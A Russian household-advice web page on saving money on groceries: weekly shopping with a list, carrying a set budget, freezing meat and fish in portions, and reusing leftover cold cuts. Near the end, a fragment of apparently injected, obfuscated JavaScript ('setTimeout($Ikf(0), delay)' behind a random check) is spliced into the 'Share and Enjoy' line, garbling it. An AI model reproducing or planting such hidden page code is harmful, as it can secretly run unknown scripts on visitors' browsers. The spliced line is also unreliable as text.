www.osnovosti.ru
smk-pride.ru

Как правильно закупать продукты

c4691a50Как
Как избежать лишних трат на продукты

Часто от хозяек можно услышать, что они тратят много денег на продукты питания. Вроде бы ничего сверхъестественного и не покупают, а деньги всё равно улетают как в трубу. Из данной статьи вы узнаете несколько секретов о том, как более выгодно приобретать и расходовать продукты питания.

Покупаем правильно
1. Отоваривайтесь в среднем раз в неделю. Только так у вас на столе каждый раз будет еда исключительно из свежих продуктов. Это конечно не касается хлеба, молока и других скоропортящихся продуктов, покупать которые приходится ежедневно.

Научитесь рассчитывать покупку так, чтобы приобретённых продуктов хватало вашей семье ровно на неделю. И запомните, лучше докупить недостающие продукты, чем выбрасывать застоявшиеся.

2. Также причиной лишних затрат часто является то, что люди приобретают продукты в магазине, который ближе к дому – для удобства. Но вряд ли этот магазин отличается столь же удобными ценами. Разузнайте о недорогих магазинах или супермаркетах в вашем городе и заглядывайте туда раз в неделю. Следите за акциями, но будьте внимательны со сроком годности. Как правило в больших магазинах с умеренными ценами товар долго не залёживается и свежесть продуктов станет для вас приятным бонусом к экономии.

3. Всем известно, что за покупками нужно ходить с заранее заготовленным списком, но не стоит составлять перечень необходимых продуктов в последний момент. Лучше позаботиться об этом в течение недели, чтобы ничего не забыть впопыхах. Прикрепите чистый стикер на холодильник или заведите удобный блокнот с отрывными листами, который будет лежать на видном месте. Все домашние смогут записывать в него продукты и бытовые товары, которые нужно приобрести.

4. Подсчитайте примерную стоимость всех товаров в вашем списке и возьмите с собой именно эту сумму денег, можете превысить ее разве что самую малость, на случай подорожания отдельных товаров. Так вы убережете себя от лишних затрат.

5. Лучше ходить за покупками сытым, так как не будет соблазна приобрести что-то вкусненькое, но ненужное и дорогое. Но вы ведь и так уже следуете этому правилу, правда?

Расходуем с умом
Как же часто можно услышать от хозяйки: «Полный холодильник мяса, а я снова на ужин купила готовых котлет/фарша. Вот куда деньги уходят!» Знакомая ситуация, не правда ли?

А выходит так потому, что сразу после покупки хозяйки бросают мясо в морозилку. Теперь подумаем: ну кому захочется, придя после работы, размораживать мясо, крутить фарш и делать котлеты? Потому и появляются на столе вредные и безвкусные полуфабрикаты.

Теперь вы знаете секрет и, купив рыбу, мясо или курицу не станете сразу замораживать их. Курицу и рыбу лучше разделать на небольшие порционные кусочки и разложить по отдельным пакетикам, а уже потом заморозить. Теперь, если вам на ужин понадобиться четыре кусочка – вы столько и возьмёте. Также стоит поступить и с мясом: нарежьте его на кусочки для отбивных, гуляша или сразу сделайте фарш и слепите котлет. Затем также порционно заморозьте.

Это весьма удобно – сутра, перед работой, можно вынуть пакетик из морозилки, а вечером быстро приготовить нужное количество уже размороженного продукта.

Чаще всего мясные или рыбные блюда съедаются за один присест, а гарнир, наоборот, часто остаётся. Конечно, можно доесть вчерашние макароны на следующий день, но будем честны к себе, какой у них будет вкус? Поэтому нужно рассчитывать порцию таким образом, чтобы её хватило ровно на один раз.

Зачастую после шумных застолий и праздников остается колбасная и мясная нарезка. Она быстро подсыхает, обветривается и приобретает непоказной вид, хотя по качеству это хорошие продукты. Если некому её сразу доесть, мелко нарежьте её и заморозьте, в дальнейшем можно будет использовать её в приготовлении солянки. А вообще отличный вариант — после праздников готовить пиццу, чтобы никакие остатки не пропали.

Остатки рыбной нарезки можно очистить от костей и, переложив колечками свежего лука, залить маслом. Такие пресервы хранятся в холодильнике неделю.

Вот небольшая часть советов для тех, кто хочет экономить на кухне.

У каждой хозяйки наверняка масса собственных секретов. Но возможно, что-то из перечисленного здесь поможет вам в ведении хозяйства и экономии семейного бюджета.

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники
Яндекс.Метрика